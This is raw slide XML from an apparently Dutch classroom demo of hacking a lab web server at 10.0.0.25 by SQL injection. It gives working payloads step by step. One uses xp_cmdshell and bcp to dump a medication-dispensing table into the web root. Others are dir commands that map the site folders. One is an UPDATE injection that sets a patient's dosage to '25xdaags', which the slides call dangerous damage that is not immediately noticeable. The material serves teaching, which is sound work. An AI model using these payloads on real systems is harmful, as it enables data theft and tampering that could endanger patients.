              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>medicijnuitgiften</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             Vul de volgende URL in: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>              '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>..medicijnuitgiften" </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>queryout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"c:\xampp\htdocs\mu.txt" -c -T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> Klik op login ........! lees uit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.0.25/mu.txt</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1934577" y="5497882"/>
            <a:ext cx="6272312" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Afgaand op het voorafgaande ....wat verwacht je maar te vinden?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11152991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8228408" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>beschadigen van informatie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beschadigen van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>informatie(niet meteen merkbaar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>)</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521440" cy="4031873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Sluit de browser als die nog open is en open deze vervolgens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Nu kun je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>gevaarlijke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> schade doen, bv doseringen wijzigen.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                      kunt de kolomnamen ook eenvoudig opvragen. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>Slaan we nu over</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             Vul de volgende URL in: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bla';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>update medicijnuitgiften set dosering='25xdaags' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patientnr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='p302</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2527429" y="5352970"/>
            <a:ext cx="7380245" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Kijk voor je deze query gaat gebruiken wat op dit moment de dosering van de bewuste patiënt is. En kijk weer na het uitvoeren van de query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>:Realiseer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> je dat dit gevaarlijke, niet meteen merkbare schade is </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2998338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dirty="0" smtClean="0"/>
              <a:t>testomgeving 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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manipuleren van een website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Toegang verschaffen tot een machine</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>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056940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 Vooronderzoek.</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Manipuleren van een website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2282179" y="2111855"/>
            <a:ext cx="7364240" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Op dit punt weet de hacker dat er een XAMPP webserver wordt gebruikt. Een beetje hacker weet hoe de structuur van zo'n site in elkaar steekt en kan daar zijn voordeel mee doen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>: in de praktijk zullen er wel meer voeten in aarde in maar het principe van wat volgt, is het zelfde.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3377400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406391" y="1096894"/>
            <a:ext cx="8510954" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>manipuleren van een website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Manipuleren van een website</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154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 1</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     "dir c:\xampp\htdocs &gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      c:\xampp\htdocs\sites.txt" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> Klik op login ........! lees uit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.0.25/sites.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659539" y="3429615"/>
            <a:ext cx="2845823" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Let op de spaties.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1073140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406391" y="1096894"/>
            <a:ext cx="8510954" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>manipuleren van een website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Manipuleren van een website</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154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: Uit inspectie van de sites.txt (via http://10.0.0.25/sites.txt) file blijkt</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              dat er een site lijkt te bestaan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>OranjeWS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>. ....Kun je uitvragen!</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     "dir c:\xampp\htdocs\OranjeWS &gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      c:\xampp\htdocs\OWS.txt" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0"/>
              <a:t> Klik op login ........! lees uit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.0.25/OWS.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="nl-NL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Tekstvak 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8659539" y="3429615"/>
            <a:ext cx="2845823" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Let op de spaties.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220301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406391" y="1096894"/>
            <a:ext cx="8510954" cy="650375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
